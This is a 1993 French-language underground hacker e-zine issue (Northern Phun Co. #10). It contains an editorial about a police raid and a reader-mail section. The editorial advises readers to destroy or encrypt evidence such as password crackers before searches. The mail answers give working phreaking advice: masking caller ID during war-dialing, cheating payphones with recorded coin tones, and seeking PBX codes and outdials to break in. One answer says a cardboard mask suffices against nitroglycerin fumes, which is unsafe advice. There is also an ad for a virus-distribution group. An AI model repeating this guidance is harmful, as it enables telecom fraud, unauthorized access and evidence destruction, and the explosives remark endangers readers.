Copy Link
Add to Bookmark
Report
Northern Phun Co Issue 10
________ _________________________
\_____ \ / _____________________ \
__ \ \/ /____________ ___ \ )
) \ \ / \________ ) / / )/
/ / ) / ___ / / / /
______ ________/ / / / / /__/ / / (___________ ______
(_____( (__________/ (__/ / /(____( (_______________) )_____)
/ /
/ /
/ /
\ ( MF
--------------------------- \/ ------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
-------------------------------------------------------------------
N O R T H E R N P H U N C O .
N U M E R O D I X ú P R E M I E R O C T O B R E 1 9 9 3
Dans ce dixime numro de NPC:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ú
:
|
- -ÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-- - ú
³ +:SUJET:+ ³ +:AUTEUR:+ ³
³ú - -ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ú - -ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ Table des matires / Disclaimer ³ -=ThE PoSSe=- ³
³ ditorial de NPC #10 ³ Blitzkreig ³
³ The postman always quote twice ³ Votre Courrier ³
³ Le franc parler du vieux Mde ³ Merlin l'emmerdeur ³
³ Fun Phun avec l'Universit Laval ³ Gurney Halleck ³
³ Une expo
tout casser... ³ Blitzkreig ³
³ Internet: la classe
part... ³ Gurney Halleck ³
³ Les lections:
vomir... ³ Blitzkreig ³
³ Thunder BBs et les lamers... ³ Atreid Bevatron ³
³ Activisme
l'cole: Oy! Oy! Oy! ³ L0grus! ³
³ Une autre lettre
la GRC... ³ Blitzkreig ³
³ Internet: bonnes adresses ³ Gurney Halleck ³
³ Le Ncronomicon des virus... ³ Coaxial Karma ³
³ Mes phantasmes sur Kim Campbell... ³ Fairy Dust ³
³ Trashing Bell Style! ³ Santa Claus ³
³ Bonjour la police... ³ THX 1138 ³
³ Palmars techno-rave... ³ Genghis Dan ³
³ Libert libert chrie! ³ Blitzkreig ³
³ Coupons les jambes de Clipper... ³ Kermit ³
³ The book on NPC... ³ Blitzkreig ³
³ Beginner's guide to warez boards ³ The Shaman ³
³ Une toune de plus... ³ Blitzkreig ³
³ Read the news... | -=ThE PoSSe=- ³
- ú - --ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅ--
|
:
ú
NPC are: Officiers Collaborateurs
Blitzkreig L0grus!
Kermit Merlin L'Emmerdeur
Gurney Halleck The Shaman
Atreid Bevatron Genghis Dan
The SubHuman Punisher Coaxial Karma
Santa Claus THX 1138
Paranoid
DISCLAIMER - AVERTISSEMENT
Ce magazine n'est pas recommand aux gens qui portent un Pacemaker,
aux mes sensibles, et aux moralisateurs. Tenez-vous le pour dit,
et abstenez-vous!
Ceci va probablement tre le disclaimer le plus long de l'histoire
des magazines underground car, sur les conseils de gens
gnralement bien verss dans le domaine (vous savez que les
avocats rclament 150$ de l'heure? Chi!) une mise au point
exhaustive doit tre faite avant de vous permettre de poursuivre
votre lecture (et non pas de poursuivre Northern Phun Co.: vous
tes pas drles!).
1) Tous les articles de ce magazine ne sont publis qu'
titre
d'information. L'application de une ou des technique(s)
explique(s) dans ces pages peuvent entraner la mort, des
blessures srieuses, l'impuissance, la perte de votre virginit,
des poursuites judiciaires embtantes, le bris de votre ordinateur,
la nomination de Camil Samson
la tte du Parti Libral ou, pire
encore, vous pourriez devenir comme vos parents!
2) Northern Phun Co., qui est un organisme
but non-lucratif, avec
une vocation quasiment philanthropique, ne sera en aucun temps tenu
pour responsable de l'irresponsabilit des auteurs qui publient des
articles dans ces pages. L'entire responsabilit, et la preuve de
la vracit desdits articles, revient aux auteurs. On est mal
parti, l
, les enfants...
3) Les officiers clairement identifis de Northern Phun Co. sont
seuls habilits
parler au nom du groupe, et NPC ne serait tre
tenu pour responsable de la conduite (ou de l'inconduite) des
collaborateurs de NPC sur les babs de la plante Terre. De plus,
seuls les textes des officiers de Northern Phun Co. sont vrifis
pour leur exactitude.
4) La lecture de Northern Phun Co., quoique rjouissante, peut
entraner aussi des problmes de sant mentale et des cas de
pilosit manuelle (comme pour la masturbation).
5) Northern Phun Co accepte,
priori, de publier tous les textes
touchant au H/P/C/A/V-et-le-reste qui lui seront soumis. NPC
refusera, par contre, tout texte encourageant la discrimination
d'une ou des personne(s) en fonction de leur origines ethniques, de
leur religion ou de leur sexe. Si vous voulez bouffer du ngre,
engagez-vous plutt dans la police...
6) Northern Phun Co. tient
rappeler
ses lecteurs qu'il faut
soigneusement se brosser les dents aprs chaque repas. Et n'oubliez
pas la soie dentaire!
Est-ce que a suffit l
?
O nous rejoindre?
------------------
D la nature "volatile" de notre produit, les babs qui nous
supportent le sont tout aussi. Ceci dit, vous avez toutes les
chances de pogner un des officiers de NPC sur les babs PUBLICS
suivants (on pousse la perversion jusque l
!).
Light BBS : 418-651-5664
Black Palace : 418-831-1602
The Cannibal Cookhouse : 418-657-4442
Terminus (Baie-Comeau ) : 418-295-2854
Il y a aussi un bab qui vous offre une messagerie anonyme pour NPC,
comme au bon vieux temps de Mdic!
The Inferno: 418-647-2731
Si votre babillard public (hors 418) dsire ouvrir une section NPC,
n'hsitez pas
nous contacter. C'est gratuit!
Nous sommes aussi (naturellement) sur les boards pirates de Qubec.
En fait, sur Workshop, il y a tous les officiers de NPC qui
prennent un bain de soleil... C'est comme qui dirait notre H.Q.
underground.
Nous ne publions plus de numero de VMB. Dsol, mais on les perdait
mesure qu'on les publiait, alors... Un coup des coches, je
suppose...
Nous avons aussi une adresse Internet pour e-mail:
npc@sietch.ci.net
Et si malgr tout a vous n'tes pas capable de nous rejoindre,
appelez l'Arme du Salut, et demandez Roger...
-------------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
-------------------------------------------------------------------
EDITO 10
THIS TIME, IT'S WAR!
par Blitzkreig
"Ils sont entrs les armes au poing pendant que je
dormais. Leurs walkie-talkies crpitaient de toute
part: "Rsiste-t-il? Avez-vous besoin d'un back-up?"
-The Subhuman Punisher, sur la descente
son
domicile...
J'cris ces lignes quelques heures avant que NPC 10 ne
paraisse. Nous sommes le 1er octobre et, hier soir, vers 20 heures,
les chiens sont entrs chez SubHuman, en sont ressortis avec son
ordinateur, non sans l'avoir inculp sous deux chefs: vol de
service de tlcommunication, et utilisation illgale d'un
ordinateur. La valse des avocats commence...
Nous n'avons pas encore pu lire l'acte d'accusation proprement
dit, ni discuter avec TSP et son avocat. Nous reviendrons bien sr
dans NPC 11 avec tous les dtails de l'affaire, jusqu'
la moindre
virgule. Mais, pour l'instant, il est important d'tablir quelques
faits:
1- La GRC a monitor les lignes intrieures de l'Universit du 16
au 30 septembre. Quiconque a utilis le 656-7700 et compos
l'adresse de l'Universit du Qubec pour se rendre ailleurs,
nommment sur un service avec Internet, a t logg. Petit cadeau
du CTI...
2- Les sysops du Domaine .ere de l'universit de Montral ont logg
les usagers de leur systme, particulirement ceux qui utilisaient
Internet, et ont refil le dossier
la GRC.
3- La GRC, au cours de ses perquisitions, est tout particulirement
la recherche de users lists de systmes UNIX (encryptez ou
effacez, et vite!), et de crackeurs de passwords, style Jack ou
Hades (effacez, et vite!)... Un pirate averti en vaut deux.
4- La GRC a plusieurs personnes dans le collimateur. A ce moment-
ci, nous pensons qu'elle a dj
effectu quelques autres
arrestations sommaires.
Pour ce qui est de la GRC, on dealera avec eux plus tard.
Leurs mthodes d'intimidation, a commence
bien faire. Pntrer
l'arme au poing dans la rsidence d'un kid de 16 ans, c'est de
l'intimidation. Demander au kid le style de manteau qu'il porte, en
lui disant que c'est "pour les filatures ultrieures", c'est du
harclement
l'tat pur. Et je vous parle pas tout de suite du
reste. Ces cons n'ont pas fini de se faire dtester...
Ca ressemble
une alerte gnrale. S'en est une. Le "suppos"
crime de SubHuman Punisher (rien n'a encore t prouv) aurait t
de vouloir tre sur Internet, comme c'est son droit. Il est plus
urgent que jamais que Libert Libert Chrie!, la node lgale que
nous voulons partir
Qubec, dbouche sur quelque chose de
concret. Nous ne pouvons pas tolrer plus longtemps que nos rangs
se fassent dcimer parce qu'il n'y a pas d'accs Internet
Qubec
qui soit abordable. Une fois en scurit sur LLC, nous nous
occuperons de rendre la monnaie de la pice
tous ces chiens.
Le mot "chien" est faible. Ce sont des sclrats. L'ennemi
public numro un, en ce moment, ce n'est pas le hacker, c'est le
CTI de l'universit Laval. Vous voulez des preuves? Juste une, en
passant (le reste du dossier sortira dans les mdias d'ici la
parution de NPC 11)...
NPC tente, depuis quelques jours, de trouver un endroit qui
pourrait nous louer une connexion SLIP, afin d'oprer LLC. Nous
avons bien entendu t frapper
la porte de l'adversit Laval. Le
responsable de l'attribution des SLIPs
Laval s'appelle Marc
Blanchette et il travaille
ICS, un dpartement qui fait partie du
Gnie lectrique de l'universit Laval. Blanchette nous a envoy
chier, prtextant que ce n'tait pas une question d'argent (nous
lui offrions des sommes fort raisonnables), mais de principe. Il
nous a nargu en nous disant que le seul organisme qui tait
autoris
exploiter un SLIP
partir de l'universit, c'tait
Unix-Qubec.
Entretemps, nous avons appris deux petites choses
intressantes.
1- L'Universit est tellement gnreuse que, suite
une
recommandation de Marc Blanchette, elle "donne" quasiment le SLIP
UNIX-Qubec.
2- Le prsident de UNIX-Qubec est... vous l'aurez devin, Marc
Blanchette. Est-ce que le mot "conflit d'intrt" signifie quelque
chose pour vous? Ce twit est responsable des entres Internet
Laval, il dcide, par soif de pouvoir, de ne pas accorder des
connexions, avec une exception pour son propre organisme. Mieux
encore, Unix-Qubec (donc Marc Blanchette) ne paie pour ainsi dire
rien pour sa connection, mais charge le gros tarif aux entreprises
commerciales qui s'abonnent
Unix-Qubec. Il se met du cash dans
ses poches, en volant (il n'y a pas d'autre mot) l'universit.
C'est le recteur Gervais qui va tre content d'apprendre a!
Encore une fois (ma rengaine habituelle!): et c'est nous qu'on
traite de voleurs!
But wait, it gets even better! On a quelques dossiers en route
sur des gens bien placs du CTI et, ds qu'ils vont tre achevs,
on va aller porter a aux mdias, aux associations tudiantes, au
recteur, aux Soeurs Grises de la Rdemption s'il le faut! Mais on
va avoir la peau de ces gens, je vous le jure! This time, this is
war!
Adresse de Unix Qubec: Unix-Qubec
1173 Boul. Charest O.
Bureau 300-9
Qubec Qc.
G1N 2C9
tel:684-0249
fax:684-0250
--------------------
Et SubHuman, dans tout cela? Ben, coutez, de la manire dont
je vois a, le mec va s'en tirer avec une amende de quelques
centaines de dollars, une facture d'avocat assez sale (son pre
s'en occupe), et quelques maux de tte en plus. Le pire, c'est la
confiscation de son matriel, qu'il ne pourra pas rcuprer avant
trois ans (c'est ce que la loi dit). Imaginez-vous un instant sans
ordi pendant trois ans! Impensable!
Alors, voici ce qu'on vous propose: ds que la date du procs
sera connue, on la postera sur les babs. Vous vous pointez (vous ne
voulez surtout pas manquer le moment o la GRC va manger ses bas!),
et on passe le chapeau
la fin de l'audience, pour permettre
SubHuman de s'acheter un AT usag, le temps de voir venir. Parce
que, contrairement
la facture d'avocat, a m'tonnerait beaucoup
que son pre accepte de lui racheter un autre ordi!
Vous pouvez d'ores et dj
, si vous le dsirez, envoyer un
chque
l'ordre de (et c'est pas des farces) FONDS DE DFENSE
SUBHUMAN PUNISHER,
l'adresse suivante:
FDSP
886 St-Vallier Est #7
Qubec, Qc
G1K 3R4
On va ouvrir un compte dans une Caisse Pop
ce nom-l
(j'ai
hte de voir la face de la prpose aux guichets!). Envoyez ce que
vous pouvez, un dix, un vingt, ou plus... Imaginez-vous sans ordi
pendant trois ans! Si a vous arrivait
vous, vous aimeriez bien
que vos confrres et consoeurs du cyberspace viennent
votre aide.
Et puis, cet argent, il ne sera pas perdu pour vous non plus. A la
seconde o LLC va tre ouverte, on va vous le crditer en temps...
-----------------
Ce numro dix marque la fin de la premire anne d'existence
de NPC. Le mois prochain, on fte notre premier anniversaire. On va
faire a en grand. Au bout d'un an, on a le got d'amliorer encore
davantage la formule de NPC -ze magazine!- et c'est pourquoi,
compter du prochain numro, Blitzkreig ne sera plus le seul diteur
de NPC. En effet,
chaque deux numros, un autre officier NPC sera
invit
prendre en mains l'dition du mag. Atreid Bevatron a t
dsign pour s'occuper du 11. On espre ainsi apporter un regard
neuf, de temps
autre, sur ce que NPC devrait tre.
Mais, ce mois-ci, de bonnes lectures vous attendent. On en
profite pour saluer l'arrive de Gurney Halleck au sein des
officiers de NPC. Il remplaait SubHuman, justement, qui nous avait
quitt quelques mois plus tt. Mais, vu les vnements, The
SubHuman Punisher retrouve son statut d'officier, honoris causa!
Et pour le reste, read on, dear friends...
-=BlItZKrEiG=-
P.S: Le mois prochain, donc, NPC fte son premier anniversaire! On
veut recevoir des cartes de voeux en ASCII, en ANSI, ou des beaux
petits mots doux (mais pas de citations
comparatre, s.v.p.)! Les
plus beaux seront publis dans NPC 11! Vous n'avez qu'
les dposer
dans un bab NPC, avec une petite note.
Alors, allez chercher The Draw chez tout bon dpanneur, et au
travail! Soyez pas radins, montrez que vous nous aimez bien!
P.P.S: On vous a joint un petit fichier, ramass sur Internet, sur
l'encryption. Assez complet, une bonne lecture en somme, pour les
amateurs du genre... Et plein d'autres petits cadeaux. Comme Pif
Magazine! ;-)
-------------------------------------------------------------------
úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú
-------------------------------------------------------------------
THE POSTMAN ALWAYS QUOTE TWICE
-=Votre Courrier=-
"Messages Blitz" (Msg Priv) #623
Date : 06-09-93 00:43
De : Pawa
A : Blitzkreig
Sujet : Toneloc
Salut Blitz...
En passant, tu savais probablement que blitzkreig
voulait dire guerre-clair en allemand (ou plutt en franais...),
est-ce pour dcrire la brivet avec laquelle tu termines une
guerre sur les messageries???
Je suis un apprenti-modemiste (a se dis-tu?) et j'ai
obtenu dans ma premire journe de modem votre revue, NPC... Pis je
peux vous dire que j'ai t trs impressionn. As-tu dj
vu le
film "LES ESCROCS"? Ben quand j'ai cout ce film (que j'ai trouv
bon d'ailleurs) je me suis dit "Ben voyons, c'est ben trop pouss,
a se fait pas pirater des systmes comme a, c'est ben trop
protg... Pis en voyant votre revue, (surtout en la lisant!), je
me suis rendu compte, c'est vrai, c'est pouss, mais juste un
peu... Presque tout est piratable... Sauf qu'utiliser les
satellites c'est peut-tre se compliquer la vie un peu trop hein?
Puisque parait-il, il est si simple de hacker un PBX ou
s'approprier un VMB...
J'cris ce message en fait pour parler de TONELOC. J'ai
acquis ce petit bijou (selon ce que l'on en dit...) dans votre #2.
Pis j'ai quelques interrogations. D'abord, est-il risqu de scanner
ainsi,
partir de mon domicile sans passer par un Externe (comme
l'Universit). Je pense
Maestro par exemple. Aprs avoir scann
2000 numros, je vais srement en pogner une couple qui auront un
maestro pis qui vont me dire: "Eille y'a quelqu'un qui a appel
icitte, c'est-tu toi. -oui c'est moi, je m'tais tromp de numro.
-comment a tromp de numro, tu sais pas pitonner? -Bon coute,
j'ai fait une erreur de composition l
s'correct, j'm'excuse je
recommencerai pu... -Ouains, parce que moi je vais me plaindre
pis... FUCK YOU!!! " Alors ma question est, est-il possible avec
TONELOC de se servir de *67?? Est-ce ncessaire ou est-ce que
scanner ne reprsente en fait qu'un minime danger?? Ou peut-on
utiliser des Externes avec TONELOC?? Ensuite, y a t-il certains
numros "BLACK LIST" ou je ne doit absolument pas appeler (je pense
ici
des endroits trs protgs).
Excuse pour le message trs long, en esprant ne pas
t'avoir trop fait bailler, longue vie
NPC et une rponse serait
grandement apprcie.
Pawa
--------------------
[Blitz- Je connaissais, pour mon handle, n'aie crainte! Mais voici
Atreid qui vient
ton secours!]
[Atreid- En fait, tout dpend o tu demeures. Tant que tu es dans
la province de Qubec, d'aprs ce que j'en sais, tu ne cours AUCUN
danger. Au tats-Unis, dans plusieurs tats, c'est devenu
impossible de scanner. Aprs X numros en moins d'une heure, ils
dconnectent ta ligne et tu dois les rappeler, en encaissant un tas
de questions. Au Qubec, tu peux scanner. Tu dois connatre la
diffrence entre scanner local et scanner les 800. En fait, si tu
scannes local, tu n'as qu'
mettre *67 devant tous les numros.
Pour ce faire, dans le paramtre /Mxxx-xxxx, tu n'as qu'
mettre,
la place, /M*67,xxx-xxxx. Le xxx est bien entendu le numro. La
virgule rsulte en une pause de deux secondes. Si tu ne peux pas
composer aprs seulement deux secondes, tu n'as qu'
rajouter une
autre virgule, jusqu'
ce que a marche... Bien sr, tout a est un
peu plus long, mais... c'est plus que du bonbon... ;-)
Pour ce qui est des numros
blacklister, inscrit seulement
les numros de la police, les plus gros hopitaux et ce genre de
choses... En fait, il n'y vraiment que les flics que tu ne dois pas
faire chier...
Les numros 800 maintenant. Le service *67 n'est pas utile
pour les 800... Aux tats-Unis, ils auront ton numro, bien que
j'ai rcemment entendu dire que le service ANI ne se donnait pas
inter-pays, mais, du moins, AT&T aura ton numro en log quand
mme... Pour ce qui est du Canada,
ce que j'ai su, au lieu
d'crire ton numro sur le 'Super-Maestro-800', il s'affiche
quelque chose comme: 418-666-XXXX lorsque quelqu'un utilise *67...
C'est ce que TSP avait appris en s'informant au bureau du Bell en
disant qu'il voulait des infos pour avoir sa ligne 800... Enfin,
tout a pour dire que c'est srement une source sre... Mais est-ce
utile de scanner les 800 avec *67? Moi je dis non, sauf si tu
cherches un CODE dans un PBX. Autrement dit, a peut tre prudent
si tu appelles le mme numro plusieurs centaines ou milliers de
fois...
Enfin, voil
!]
---------------------
#119/119 ([Public]) [AREA: General Chat]
Sent : 19-Sep-93 16:19
From : Back-ups
To : All
Subj : NPC
Ce message est pour tous le monde, mais surtout pour la gang
de NPC. Votre .VOC dans le NPC-009, c'est de la grosse marde, pis
ca a ete fait par un trou de cul, pourquoi vous n'avez pas ajout
les tone comme du monde par dessus ceux de l'annimateur si vous
n'tiez pas cappable de sampler ca comme du monde, pis le maudit
buzage durand l'enregistrement, c'est tu de la marde un peut... TK,
j'ai rien contre NPC, mais ils essaye de s'enfler la tete en
faisant des magazine de 4-500 Ko, et ils disent rien, c'est des
affaire d'ammateur, toute des hypothese, y a rien qui se tien dans
ca, j'en ai fsais moi des passes, et c'est pas juste des choses qui
pourais se faires, c'est des choses qui se font, a par dire ce que
vous pourier faire, et pas dire de solution ca vaut rien, c'est
quoi cette peur de dire la verite!
--------------------
[Blitz- Pauvre twit! T'as rien compris, va! Que le monde utilise ou
pas le NIP,
la limite, on s'en crissait. Vois-tu, Bell a lu
l'article, et Unitel a lu l'article. Unitel a t, n'en doute pas
une seule seconde, compltement humili de savoir que le public ET
la concurrence ont pris connaissance de leurs bvues. A part a,
pauvre connard, modifier le tone ou l'enregistrement aurait pu nous
mettre sous le coup de la loi, d'apþs notre conseiller juridique.
Mais a, tu le sais peut-tre. Peut-tre que t'es un narc qui nous
provoque pour qu'on fasse un faux pas. Parce que, autrement, Back-
ups le clbre pirate qui "en ai fsais moi des passes", il n'y a
personne qui le connat. Ca prend vraiment un twit de narc pour
tenter de nous narguer comme a...]
---------------------
Msg #: [15/18] Base: BBS Ads -<ANSI>-
Date : Sun 19 Sep 1993 8:35p Stat: Public
From : Coaxial Karma #24
To : All
Title: MiRANDA
MiRANDA
NUkE - NUkENET / C.R.i.S - CRiSNET
UseNet is available too...
(418) xxx-xxxx
To get more information on C.R.i.S.
Call to: Computer Virus Research / Information Service
(708) 863-5285
and leave a message to Michael Paris.
What is C.R.i.S.
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³
³ÜÛÛÛÛÛÛÛÜ ÜÛÛÛÛÛÛÛÛÜ ÜÛÜ ÜÛÛÛÛÛÛÛÜ ³
³ÛÛÛÛß ßÛÛÛ ÛÛÛß ßÛÛÛ ÛÛÛÛÛ ÛÛÛÛß ßÛÛÛÛ ³
³ÛÛÛÛ ÛÛÛÜ ÜÛÛÛ ÛÛÛÛÛ ßÛÛÛÛÛÜÜ ³
³ÛÛÛÛ ÛÛÛÛÛÛÛÛÛß ÛÛÛÛÛ ßßÛÛÛÛÛÜ ³
³ÛÛÛÛÜ ÜÛÛÛ ÜÛÛÜ ÛÛÛÛ ßÛÛÛÛÜ ÜÛÛÜ ÛÛÛÛÛ ÜÛÛÜ ÛÛÛÛÜ ÜÛÛÛÛ ÜÛÛÜ ³
³ßÛÛÛÛÛÛÛß ßÛÛß ßÛÛß ßÛÛß ßÛÛß ßÛß ßÛÛß ßÛÛÛÛÛÛÛß ßÛÛß ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Computer Research & Information Service
Cris is a group of computer users that have a true interest in
Computer Viruses and Trojans, as well as how they work.
Members of Cris feel a need, not only to be up on the latest
Bombs, Trojans, Worms, and Viruses, but to safely transfer these
files into the hands of other dedicated researchers.
Cris cannot be held responsible for the use or misuse of these
files. Cris releases are sent out to better the knowledge of the
virus community, for those who would like to learn more about them
and how they work.
Also, all Cris releases have been pre-tested and informative text
files are enclosed with valuable information regarding the type of
virus, how it works, and removal information. If the virus you
downloaded is not a Cris release, you don't know what you've got.
Nephili
(Original Text Written By File God)
Coaxial Karma - C.R.i.S. Researcher
SysOp of MiRANDA [NUkE/NuKE NEt] [C.R.i.S/CRiS NEt]
(418) xxx-xxxx
ckarma@miranda.ci.net
ckarma@sietch.ci.net
----------------------
[Blitz- J'espre que a vous drange pas qu'on vous fasse un peu de
pub? ;-) ]
----------------------
Date: 5:39 pm Thu Sep 9, 1993 Private 1/3
From: Black Angel #1 Private Mail
Title: Nitro machin
Salut Blitz,
bon je vais tre bref une fois dans ma vie ! Ta
solution pour faire de la nitroglycrine et celle pour le
fulmi-coton, ou nitro-coton, on m'a dit que cela pouvait causer de
srieux maux de tte, donc selon la source, on peut s'en rappeler
trs, mais trs longtemps! Pourrais-tu me dire si cette personne
s'est trompe?
Merci,
Black Angel
-------------------
[Bliz- Tu tombes bien en estie, Black! Hysteric publiera bientt un
update sur ses recettes. Et puis, pour les vapeurs, un masque de
carton devrait suffire.]
------------------
"Messages Blitz" (Msg Priv) #740
Date : 19-09-93 02:07
De : M.
A : Blitzkreig
Sujet : A very long Story...
Salut Blitz, j'voudrais te fliciter pour ton mag, NpC. Je l'ai
dcouvert, a fait environ 3 mois, par un pur hasard sur un board
de la rgion de Montral (oui! pis c'est d'l
que j'calle). Comme
tout jeune petit twit de 16 ans, en le lisant j'ai tout simplement
buzz. C'tait la premire fois en mes 2 annes de bbsing que je
touchais au h/p (j'devais tre trop occup par les warez). J'en
avais souvent entendu parler (le h/p), mais disons que je m'en
crissais, j'sais pas pourquoi. Aprs avoir lu la plupart des
articles de NpC, j'me suis procur la srie complte de la revue
Phrack, #1 to 42.
Fuck, ben disons que, toute a, tu dois srement t'en crisser,
mais il fallait que je t'le dise. Man, you and your mag changed my
life! :) Il me semblait qu'il manquait quelque chose quand je
courais aprs tous ces warez. Le h/p tait ce quelque chose. J'ai
appris plus de choses en 3 mois que j'en ai appris pendant toute
l'anne prcdente.
Mais il y a quelque chose qui semble difficile, c'est de percer.
C't'
dire de hacker son premier systme. Oui j'ai russi avec
des VMBs, j'ai trouv des PBX, mais je n'ai jamais t capable de
hacker un systme UNIX (Fuck, c'est supposment les plus faciles!).
Je sais que t'as entendu a 1000 fois auparavant (sauf avec moins
de fautes d'orthographe), ts moi j'attribue a au fait que j'ai
pas vraiment de contacts avec de vrais hackers. Le meilleur gars en
info que j'ai jamais connu personnellement, c'est moi! Nway
finalement j'ai une couple de questions/demandes/suggestions:
-Pourrais-tu me donner le # d'un ou plusieurs boards,
prfrablement du 514 et pas ncessairement h/p, mais o je
pourrais engager la conversation avec des hackers.
-Sais-tu o est-ce que je pourrais me pogner d'autre revues ou
T-files sur le h/p, de prfrence dans le 514.
-Aurais-tu des livres/T-files
me conseiller et pourrais-tu me
dire
quel endroit je pourrais me les procurer, encore une fois,
DE PREFERENCE A MONTRAL.
-Quel sont les universits ou n'importe quel autre endroit
Montral qui offrent Internet?
-Pourquoi appelle-t-on un red box un "red" box? Ou un blue box un
"blue" box?
-Les programmes genre bluedial, bluebeep,
quoi a sert? C'est
quoi le trip de recrer
travers ta carte de son des 25 cents qui
s'font flusher quand t'es
2 km d'une boite tlphonique. T'es-tu
suppos de le taper le son du 25 cent ou quoi? Ouais, a doit tre
a.
-Dernirement, j'ai comme un peu trop scann dans les 800 d'AT&T
(5 soirs de suite) pis maintenant quand je compose n'importe lequel
numro 800 qui leur appartient a dit "you have dialed a number
that is not available from your calling area" Bullshit... Un de tes
officiers en avait dj
parl dans un article mais j'me souviens
plus lequel. Que c que j'peux faire maintenant
part que de
changer de # de tlphone?
-J'ai rencontr, en scannant dans des 800, un drle de PBX: J'ai
beau entrer n'importe laquelle srie de # mais le tone s'arrte
jamais. Habituellement ds que tu entres un # le tone s'arrte.
C'est quoi c'te marde l
!?
C'est tout!
Slut!
<J'aimerais mieux que tu publies pas a dans NpC. I hate fame :) >
----------------------------
[Blitz- Dsol, mais on a publi. Avec le maximum de
confidentialit, cependant. Tes questions taient trop nombreuses
et trop intressantes pour qu'on ne les fasse pas partager
tout
le monde. Voic les rponses de mon estim confrre, Atreid. Merci
de nous lire!]
[Atreid- Ouf! T'es curieux to! ;-) Voil
:
Les numros de BBS: Tu comprendras mon ami, que mme si tu
sembles trs intress et des plus sincres, je ne peux divulguer
aucun numro de bbs pirates, confidentialit et prudence obligent.
Autres revues H/P: Je ne connais pas tellement les bbs
Mtl,
et je ne connais pas d'autres bbs que les H/P o tu peux trouver
des t-philes... Si tu russis
aller sur Internet, va FTPer
FTP.EFF.ORG , tu y trouveras srement beaucoup de bonnes choses...
Bon, livres: En fait, si tu veux apprendre UNIX, le mieux est
que tu t'achtes un bon gros livre UNIX, pareil pour le reste. Que
ce soit H/P ou pas ne change pas grand chose... Pour ce qui est des
librairies, a, mon vieux, je ne le sais foutrement pas... Il y a
un bon moment que je n'ai pas R-explor Montral, et j'avoue que
je suis
court de renseignements. Donc, je ne peux que t'indiquer
la voix de la raison, cherche dans les plus grosses librairies, et
demande au commis de te donner des noms de librairies qui
pourraient t'aider. Habituellement, ils se font un plaisir de
t'aider...
Universits: McGill, Universit du Qubec, ... T'as qu'
toutes les appeler et
leur demander des renseignements
toutes... Ensuite trouves les meilleurs prix, ou les systmes les
plus faciles
hacker... Tu peux aussi essayer de trouver le numro
des systmes des siges sociaux de plusieurs grosses compagnies,
car plusieurs ont un lien internet
ce que j'en sais... Il ne te
restera plus qu'
pntrer le systme... ;)
Red, Blue, Green, Yellow...: La rumeur dit que la premire
Blue Box tait bleue, mais mme l
, plusieurs m'ont dit que a
n'avait absolument 'aucun rapport'... Pour les autres couleurs, je
n'ai pas l'impression que a ait un vritable sens, sauf pour
certaines exceptions... Regarde... Une URINE box sert
faire
ressentir une sorte de malaise
la personne
l'autre bout du fil,
en (si je me souviens bien) envoyant certains sons discordants et
suraigus. Tu vois un rapport avec l'urine toi? ;-)
BlueDial: Tu disais vrai ou partiellement. En fait, il existe
des plans de circuits servant
muler les bruits de 25 cents. Si
tu veux rien savoir de l'lectronique, tu peux enregistrer les sons
sur un mini-tape et envoyer le tout
traver le rcepteur du
tlphone de la cabine. Si a ne marche pas, fait ton 0+AC+# dans
la cabine, et lorsque la bonne femme te demandera d'entrer tes 25
cents, envoie les sons et le tour sera jou, si elle ne reconnait
pas la petite diffrence. Dans certains cabines, tu devras entrer
UN seul vrai 25 cents, histoire d'tablir un ground.
AT&T: Non mon vieux, je ne connais pas d'autres moyens que de
changer le numro. Scanner
AT&T semble tre devenu trs
difficile, car tu disais que tu avais scann seulement 5 soirs de
suite... Bah... Cherche des out-dials de VMB! ;-) C'est le meilleur
compromis que je peux te suggrer! :)
Le tone continu: Je suis tomb moi-mme plusieurs fois sur ce
genre de systme. En fait, je crois qu'il ne s'agit que d'un autre
type de PBX... Tu remarqueras que si tu continues d'entrer pleins
de chiffres, le tone s'arrtera
un certain moment, et si tu
restes encore en ligne quelque temps, peut-tre entendras-tu un
message enregistr qui te dira que ton code est invalide. Moi,
c'est ce qui m'arrivait... C'est trs astucieux, parce que de cette
faon, que tu aies entr le bon ou le mauvais code, a donnera un
tone quand mme, tout en ne te laissant pas la formidable
opportunit de connatre de combien de chiffres est compos le
code...
Voil
! J'espre que tu seras satisfait, tu viens de me faire
perdre une maudite demie-heure! :-) Que j'ai perdu avec plaisir. :)
Merci de nous lire... ]
----------------------------
"Messages
Blitz" (Msg Priv) #707
Date : 15-09-93 02:32 (Reu le 15-09-93 19:36)
De : Murdock
: Blitzkreig
Sujet : Internet #706 <=
Salut,
j'ai des questions, en fait les suivantes :
1: au sujet des newsgroup, comment en crer un, est-ce qu'il y a
des fichiers associs
un newsgroup (je devine que oui), un
"espace-disque" (qui serait donc associ quelque part, et dans la
mme veine; NPC ou moi-mme pourrait partir son propre newsgroup ?)
Qui supporte un tel newsgroup ? (mon intuition me dit encore oui,
ou que je suis compltement dans les patates...).
2: pour les mud's, comment en crer un, comment a marche dans
